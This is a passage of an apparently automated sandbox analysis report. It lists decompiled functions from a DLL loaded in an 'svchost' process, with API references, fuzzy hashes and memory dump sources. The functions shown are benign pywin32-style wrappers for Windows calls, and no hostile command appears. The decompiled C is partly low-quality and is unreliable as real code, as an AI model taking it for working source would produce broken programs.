                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_ParseStringTuple
                            • String ID: SIZE must be a tuple of 2 ints (x,y)$ll;SIZE must be a tuple of 2 ints (x,y)
                            • API String ID: 385655187-180444728
                            • Opcode ID: 3107b35b459c234bf4836b61e73135ad1b2a611327e3afc8d70a758c123da96f
                            • Instruction ID: 0bc7a9ff999e98224d8902ad1b53dde3a00734a89b717a70937477d6eeb1a6f5
                            • Opcode Fuzzy Hash: 3107b35b459c234bf4836b61e73135ad1b2a611327e3afc8d70a758c123da96f
                            • Instruction Fuzzy Hash: DFE04F74108201AFDB04CB24C984E36BBF9FF85309F48C648F40987122D731E85BDB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB14D0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18COMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB14D0(intOrPtr _a8) {
				void* _t2;
				void* _t3;
				void* _t4;
				int* _t5;

				_t2 = _t4;
				__imp__PyArg_ParseTuple(_a8, "i:GetStockObject", _t2);
				_t5 = _t4 + 0xc;
				if(_t2 != 0) {
					_t3 = GetStockObject( *_t5);
					__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t3);
					return _t3;
				} else {
					return _t2;
				}
			}







                            0x6dab14d1
                            0x6dab14de
                            0x6dab14e4
                            0x6dab14e9
                            0x6dab14f0
                            0x6dab14f7
                            0x6dab1501
                            0x6dab14ec
                            0x6dab14ec
                            0x6dab14ec

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,i:GetStockObject), ref: 6DAB14DE
                            • GetStockObject.GDI32 ref: 6DAB14F0
                            • ?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DAB14F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_FromLong_ObjectParseStockTupleU_object@@
                            • String ID: i:GetStockObject
                            • API String ID: 247005983-3892312752
                            • Opcode ID: 4f1a1c02a2f12ecb3647eac6d6d447bf15273e0523bef8c644fcdd56a50ce140
                            • Instruction ID: 15f0591484196e178638e8b6648d631fbd65a619cdcbe8a3202e58226ad6054b
                            • Opcode Fuzzy Hash: 4f1a1c02a2f12ecb3647eac6d6d447bf15273e0523bef8c644fcdd56a50ce140
                            • Instruction Fuzzy Hash: D5D05EB100C2009FCF041B65EC48E2A777DEF40202F188529F897C0061E731887AAE26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA44C0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E6DAA44C0() {
				signed short _t71;
				signed short _t72;
				unsigned int _t75;
				unsigned int _t77;
				void* _t78;
				void* _t79;
				unsigned int _t80;
				signed int _t83;
				signed short _t84;
				void** _t85;
				signed int _t89;
				signed short _t90;
				signed int _t91;
				void* _t92;
				unsigned int _t94;
				signed int _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				unsigned int _t101;
				signed char* _t102;
				void* _t104;
				void** _t107;
				signed short* _t108;
				signed short* _t109;
				void** _t112;
				signed short* _t117;
				signed short* _t118;
				signed int _t120;
				signed short* _t121;
				signed short* _t122;
				signed short* _t123;
				void* _t124;
				signed short* _t125;
				void* _t126;
				unsigned int _t127;
				unsigned int _t130;
				signed short* _t133;
				signed int _t135;
				long _t136;
				unsigned int* _t137;
				unsigned int* _t138;
				void* _t140;
				signed int _t142;
				void* _t144;
				void* _t146;
				signed short* _t148;
				signed short* _t151;
				unsigned int _t152;
				unsigned int* _t153;
				void* _t155;
				void* _t158;
				signed short* _t159;
				unsigned int _t162;
				void* _t163;

				_t159 =  *(_t163 + 0x10);
				_t133 = _t159;
				 *(_t163 + 0x10) = _t107;
				_t148 =  !=  ?  *((intOrPtr*)(_t163 + 0x14)) : L"MS Sans Serif";
				_t108 =  &(_t133[1]);
				do {
					_t71 =  *_t133;
					_t133 =  &(_t133[1]);
				} while (_t71 != 0);
				_t109 = _t148;
				_t135 = _t133 - _t108 >> 1;
				_t151 =  &(_t109[1]);
				do {
					_t72 =  *_t109;
					_t109 =  &(_t109[1]);
				} while (_t72 != 0);
				_t101 =  *(_t163 + 0x28);
				_t112 =  *(_t163 + 0x10);
				_t136 = 0x26 + ((_t109 - _t151 >> 1) + _t135) * 2;
				_t75 = _t101 >> 0x10;
				 *(_t163 + 0x24) = _t75;
				_t112[1] = _t136;
				if(_t75 == 0) {
					L8:
					_t152 =  *(_t163 + 0x2c);
					_t77 = _t152 >> 0x10;
					 *(_t163 + 0x28) = _t77;
					if(_t77 == 0) {
						L12:
						_t78 = GlobalAlloc(0x42, _t112[1]);
						 *( *(_t163 + 0x10)) = _t78;
						_t79 = GlobalLock(_t78);
						 *(_t163 + 0x2c) = _t79;
						_t29 = _t79 + 0x12; // 0x12
						_t137 = _t29;
						asm("movups xmm0, [ecx]");
						asm("movups [eax], xmm0");
						 *((short*)(_t79 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x1c)) + 0x10));
						 *((short*)(_t79 + 8)) = 0;
						_t80 = 0xffff;
						if( *(_t163 + 0x24) == 0) {
							if(_t101 == 0) {
								 *_t137 = 0;
								L21:
								_t80 = 0xffff;
								L22:
								_t138 =  &(_t137[0]);
								if( *(_t163 + 0x28) == 0) {
									if(_t152 == 0) {
										 *_t138 = 0;
									} else {
										 *_t138 = _t80;
										_t138 =  &(_t138[0]);
										 *_t138 = _t152;
									}
									L31:
									_t49 =  &(_t138[0]); // 0x12
									_t153 = _t49;
									_t117 = _t159;
									_t140 = _t153 - _t159;
									do {
										_t83 =  *_t117 & 0x0000ffff;
										_t117 =  &(_t117[1]);
										 *(_t140 + _t117 - 2) = _t83;
									} while (_t83 != 0);
									_t118 =  &(_t159[1]);
									do {
										_t84 =  *_t159;
										_t159 =  &(_t159[1]);
									} while (_t84 != 0);
									_t102 =  *(_t163 + 0x2c);
									_t142 = _t153 + ((_t159 - _t118 >> 1) + 1) * 2;
									if(( *_t102 & 0x00000040) == 0) {
										L41:
										_t120 = _t142 & 0x00000003;
										if(_t120 > 0) {
											_t142 = _t142 + 4 - _t120;
										}
										_t85 =  *(_t163 + 0x10);
										_t85[3] = _t102;
										_t85[2] = _t142 - _t102;
										return _t85;
									}
									_t121 = _t148;
									 *_t142 =  *((intOrPtr*)(_t163 + 0x20));
									_t144 = _t142 + 2;
									_t155 = _t144 - _t148;
									do {
										_t89 =  *_t121 & 0x0000ffff;
										_t121 =  &(_t121[1]);
										 *(_t155 + _t121 - 2) = _t89;
									} while (_t89 != 0);
									_t122 =  &(_t148[1]);
									do {
										_t90 =  *_t148;
										_t148 =  &(_t148[1]);
									} while (_t90 != 0);
									_t142 = _t144 + (_t148 - _t122 >> 1) * 2 + 2;
									goto L41;
								}
								_t123 = _t152;
								_t104 = _t138 - _t152;
								do {
									_t91 =  *_t123 & 0x0000ffff;
									_t123 =  &(_t123[1]);
									 *(_t104 + _t123 - 2) = _t91;
								} while (_t91 != 0);
								_t124 = _t152 + 2;
								do {
									_t92 =  *_t152;
									_t152 = _t152 + 2;
								} while (_t92 != 0);
								_t138 = _t138 + (_t152 - _t124 >> 1) * 2;
								goto L31;
							}
							 *_t137 = 0xffff;
							_t137 =  &(_t137[0]);
							 *_t137 = _t101;
							goto L22;
						}
						_t125 = _t101;
						_t94 = _t137 - _t101;
						 *(_t163 + 0x24) = _t94;
						_t162 = _t94;
						asm("o16 nop [eax+eax]");
						do {
							_t95 =  *_t125 & 0x0000ffff;
							_t125 =  &(_t125[1]);
							 *(_t125 + _t162 - 2) = _t95;
						} while (_t95 != 0);
						_t159 =  *(_t163 + 0x18);
						_t126 = _t101 + 2;
						do {
							_t96 =  *_t101;
							_t101 = _t101 + 2;
						} while (_t96 != 0);
						_t137 = _t137 + (_t101 - _t126 >> 1) * 2;
						goto L21;
					}
					_t127 = _t152;
					_t146 = _t127 + 2;
					do {
						_t97 =  *_t127;
						_t127 = _t127 + 2;
					} while (_t97 != 0);
					_t112 =  *(_t163 + 0x10);
					_t112[1] = _t112[1] + (_t127 - _t146 >> 1) + (_t127 - _t146 >> 1);
					goto L12;
				}
				_t130 = _t101;
				_t158 = _t130 + 2;
				asm("o16 nop [eax+eax]");
				do {
					_t99 =  *_t130;
					_t130 = _t130 + 2;
				} while (_t99 != 0);
				_t112 =  *(_t163 + 0x10);
				_t112[1] = _t136 + (_t130 - _t158 >> 1) * 2;
				goto L8;
			}


























































                            0x6daa44c9
                            0x6daa44cd
                            0x6daa44d6
                            0x6daa44da
                            0x6daa44dd
                            0x6daa44e0
                            0x6daa44e0
                            0x6daa44e3
                            0x6daa44e6
                            0x6daa44ed
                            0x6daa44ef
                            0x6daa44f1
                            0x6daa44f4
                            0x6daa44f4
                            0x6daa44f7
                            0x6daa44fa
                            0x6daa44ff
                            0x6daa450a
                            0x6daa450e
                            0x6daa4517
                            0x6daa451a
                            0x6daa451e
                            0x6daa4523
                            0x6daa4549
                            0x6daa4549
                            0x6daa454f
                            0x6daa4552
                            0x6daa4558
                            0x6daa4579
                            0x6daa457e
                            0x6daa4589
                            0x6daa458b
                            0x6daa4595
                            0x6daa4599
                            0x6daa4599
                            0x6daa459c
                            0x6daa459f
                            0x6daa45a6
                            0x6daa45ac
                            0x6daa45b0
                            0x6daa45b9
                            0x6daa45fd
                            0x6daa460c
                            0x6daa460f
                            0x6daa460f
                            0x6daa4614
                            0x6daa4614
                            0x6daa461c
                            0x6daa464d
                            0x6daa465c
                            0x6daa464f
                            0x6daa464f
                            0x6daa4652
                            0x6daa4655
                            0x6daa4655
                            0x6daa465f
                            0x6daa465f
                            0x6daa465f
                            0x6daa4662
                            0x6daa4666
                            0x6daa4670
                            0x6daa4670
                            0x6daa4673
                            0x6daa4676
                            0x6daa467b
                            0x6daa4680
                            0x6daa4683
                            0x6daa4683
                            0x6daa4687
                            0x6daa468a
                            0x6daa468f
                            0x6daa469d
                            0x6daa46a0
                            0x6daa46db
                            0x6daa46dd
                            0x6daa46e0
                            0x6daa46e9
                            0x6daa46e9
                            0x6daa46eb
                            0x6daa46f4
                            0x6daa46f7
                            0x6daa46fc
                            0x6daa46fc
                            0x6daa46a7
                            0x6daa46a9
                            0x6daa46ac
                            0x6daa46b1
                            0x6daa46b3
                            0x6daa46b3
                            0x6daa46b6
                            0x6daa46b9
                            0x6daa46be
                            0x6daa46c3
                            0x6daa46c6
                            0x6daa46c6
                            0x6daa46c9
                            0x6daa46cc
                            0x6daa46d8
                            0x00000000
                            0x6daa46d8
                            0x6daa4620
                            0x6daa4622
                            0x6daa4624
                            0x6daa4624
                            0x6daa4627
                            0x6daa462a
                            0x6daa462f
                            0x6daa4634
                            0x6daa4637
                            0x6daa4637
                            0x6daa463a
                            0x6daa463d
                            0x6daa4646
                            0x00000000
                            0x6daa4646
                            0x6daa45ff
                            0x6daa4602
                            0x6daa4605
                            0x00000000
                            0x6daa4605
                            0x6daa45bd
                            0x6daa45bf
                            0x6daa45c1
                            0x6daa45c5
                            0x6daa45c7
                            0x6daa45d0
                            0x6daa45d0
                            0x6daa45d3
                            0x6daa45d6
                            0x6daa45db
                            0x6daa45e0
                            0x6daa45e4
                            0x6daa45e7
                            0x6daa45e7
                            0x6daa45ea
                            0x6daa45ed
                            0x6daa45f6
                            0x00000000
                            0x6daa45f6
                            0x6daa455a
                            0x6daa455c
                            0x6daa4560
                            0x6daa4560
                            0x6daa4563
                            0x6daa4566
                            0x6daa4572
                            0x6daa4576
                            0x00000000
                            0x6daa4576
                            0x6daa4525
                            0x6daa4527
                            0x6daa452a
                            0x6daa4530
                            0x6daa4530
                            0x6daa4533
                            0x6daa4536
                            0x6daa4542
                            0x6daa4546
                            0x00000000

                            APIs
                            • GlobalAlloc.KERNEL32(00000042,?), ref: 6DAA457E
                            • GlobalLock.KERNEL32 ref: 6DAA458B
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Global$AllocLock
                            • String ID: MS Sans Serif
                            • API String ID: 15508794-168460110
                            • Opcode ID: 398235f2807453b9c96e23a6ed79d8a44bbc7ab2078aab5e379f98ad2e1b71d4
                            • Instruction ID: ad62fc54d206c283bb13eb686dfb4ac0668fffeafd087623e2af608249d66991
                            • Opcode Fuzzy Hash: 398235f2807453b9c96e23a6ed79d8a44bbc7ab2078aab5e379f98ad2e1b71d4
                            • Instruction Fuzzy Hash: 2971A23C5083038BC718CF28C491676B3B1FF89708B0986ADEC598B755EF71AA86C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA6580, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                            • PyUnicode_AsUTF8.PYTHON38(?), ref: 6DAA6584
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_W@Z.PYWINTYPES38(?), ref: 6DAA65C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: FromObject_U_object@@Unicode_
                            • String ID: lfFaceName
                            • API String ID: 143151762-3321656176
                            • Opcode ID: 62477c445f2cb53ef53758508b7a258e6b661087c9c56733a64c48b6a6bec40e
                            • Instruction ID: a7a0ae4e5f4b72e080f77b68d4d8c466a831077a107d149c2c09d9b6a6d64e1d
                            • Opcode Fuzzy Hash: 62477c445f2cb53ef53758508b7a258e6b661087c9c56733a64c48b6a6bec40e
                            • Instruction Fuzzy Hash: 9AF0A7A950C6434BC7024B3889E53763F72AD03208B8C87A4D486C7326F323D499CFC6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA6970, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA697F
                            • PyArg_ParseTuple.PYTHON38(?,O:set_logger,6DAC7CE0), ref: 6DAA69A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_DeallocParseTuple
                            • String ID: O:set_logger
                            • API String ID: 4076960995-743879522
                            • Opcode ID: ca6cb2d291372cc351702bbe169193b29425a571ac9d6fd85a6f3d16c22bad6a
                            • Instruction ID: b454c113ec4e842dcecf91d06bd37dd2e1bb40d18ac0fb6f590e77fb9d854dcf
                            • Opcode Fuzzy Hash: ca6cb2d291372cc351702bbe169193b29425a571ac9d6fd85a6f3d16c22bad6a
                            • Instruction Fuzzy Hash: 8DF0A97490C702DFDF00CF29C99472537B1BB46369B6C8355E861832A2DB31D897DEA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1510, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E6DAB1510(intOrPtr _a8) {
				void* _t2;
				void* _t5;
				int* _t6;

				_t2 = _t5;
				__imp__PyArg_ParseTuple(_a8, "i:PostQuitMessage", _t2);
				_t6 = _t5 + 0xc;
				if(_t2 != 0) {
					PostQuitMessage( *_t6);
					 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
					return __imp___Py_NoneStruct;
				} else {
					return _t2;
				}
			}






                            0x6dab1511
                            0x6dab151e
                            0x6dab1524
                            0x6dab1529
                            0x6dab1530
                            0x6dab153b
                            0x6dab1543
                            0x6dab152c
                            0x6dab152c
                            0x6dab152c

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,i:PostQuitMessage), ref: 6DAB151E
                            • PostQuitMessage.USER32 ref: 6DAB1530
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_MessageParsePostQuitTuple
                            • String ID: i:PostQuitMessage
                            • API String ID: 2622261543-1062443709
                            • Opcode ID: fc513e9b155b42d68ffae736bfe9234fc268fd28bac0ade12925eae631c3131e
                            • Instruction ID: 9c59b4f3f64365cd302b4ad7a07979c2a96b4c02a2dceeb85a0c30f18f377dd0
                            • Opcode Fuzzy Hash: fc513e9b155b42d68ffae736bfe9234fc268fd28bac0ade12925eae631c3131e
                            • Instruction Fuzzy Hash: E1D017B500C204DFCB059F25EC94A6577BAFB09306B148219FC93C2232D7318C6BEA12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB8D70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                            Download Yara Rule
                            APIs
                            • UnregisterDeviceNotification.USER32 ref: 6DAB8D77
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(UnregisterDeviceNotification,00000000), ref: 6DAB8D89
                            Strings
                            • UnregisterDeviceNotification, xrefs: 6DAB8D84
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: DeviceError@@NotificationU_object@@UnregisterWin_
                            • String ID: UnregisterDeviceNotification
                            • API String ID: 2969844099-351095452
                            • Opcode ID: 3e676bfceb063fb38124eba2a7668818e1a650cd3c658093563dd2988210f9be
                            • Instruction ID: 8dda2aa7d49a610af238c5488e3f90aafb2a399962eb33e80b65ae2b1829993e
                            • Opcode Fuzzy Hash: 3e676bfceb063fb38124eba2a7668818e1a650cd3c658093563dd2988210f9be
                            • Instruction Fuzzy Hash: 0BD05E361086015FC7210B1DEC08A267BBAEBC1231B15852AE40582220DB708C434B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB8D40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E6DAB8D40(void* __ecx) {
				int _t3;
				int _t5;
				void* _t6;

				_t6 = __ecx;
				_t3 = DeleteObject( *(__ecx + 0xc));
				_t5 = _t3;
				if(_t5 == 0) {
					__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("DeleteObject", _t3);
					_t3 = _t5;
				}
				 *((intOrPtr*)(_t6 + 0xc)) = 0;
				return _t3;
			}






                            0x6dab8d41
                            0x6dab8d47
                            0x6dab8d4d
                            0x6dab8d51
                            0x6dab8d59
                            0x6dab8d62
                            0x6dab8d62
                            0x6dab8d65
                            0x6dab8d6d

                            APIs
                            • DeleteObject.GDI32(?), ref: 6DAB8D47
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(DeleteObject,00000000), ref: 6DAB8D59
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: DeleteError@@ObjectU_object@@Win_
                            • String ID: DeleteObject
                            • API String ID: 560238671-1531683806
                            • Opcode ID: 7c40c9340a3a71a7ed838bd3c547d0854255dc5324a50edba4ea6369ce6e252e
                            • Instruction ID: 8ca62d005477515a246b0107a8a8160b6ce207737555a7c57bd1e7eb2f2dfa23
                            • Opcode Fuzzy Hash: 7c40c9340a3a71a7ed838bd3c547d0854255dc5324a50edba4ea6369ce6e252e
                            • Instruction Fuzzy Hash: 19D05E361087016FDB210F19EC08A267BBAEFC1231B15852AE41592210DB709C428A61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB21B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB21B0(void* __eax, char* _a4, int _a8) {

				__imp__PyArg_ParseTuple(_a8, ":CommDlgExtendedError");
				if(__eax != 0) {
					_a8 = CommDlgExtendedError();
					_a4 = "l";
					return __imp__Py_BuildValue();
				}
				return __eax;
			}



                            0x6dab21b9
                            0x6dab21c4
                            0x6dab21cd
                            0x6dab21d1
                            0x6dab21d9
                            0x6dab21d9
                            0x6dab21c6

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:CommDlgExtendedError), ref: 6DAB21B9
                            • CommDlgExtendedError.COMDLG32 ref: 6DAB21C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_CommErrorExtendedParseTuple
                            • String ID: :CommDlgExtendedError
                            • API String ID: 3890150268-2767658568
                            • Opcode ID: fb63904b445631715c1c24686672eec9f5b716bdd446aead1dd27fc68c663b0b
                            • Instruction ID: 6904a4575f55520e32ecbfcec532e7ef9f80f486402c69105d14d88d1f7b77ef
                            • Opcode Fuzzy Hash: fb63904b445631715c1c24686672eec9f5b716bdd446aead1dd27fc68c663b0b
                            • Instruction Fuzzy Hash: 9ED0C97850D301EFCB004F25D99836A7BB5BF85252F40C629F89881121E73588A38A13
                            Uniqueness

                            Uniqueness Score: -1.00%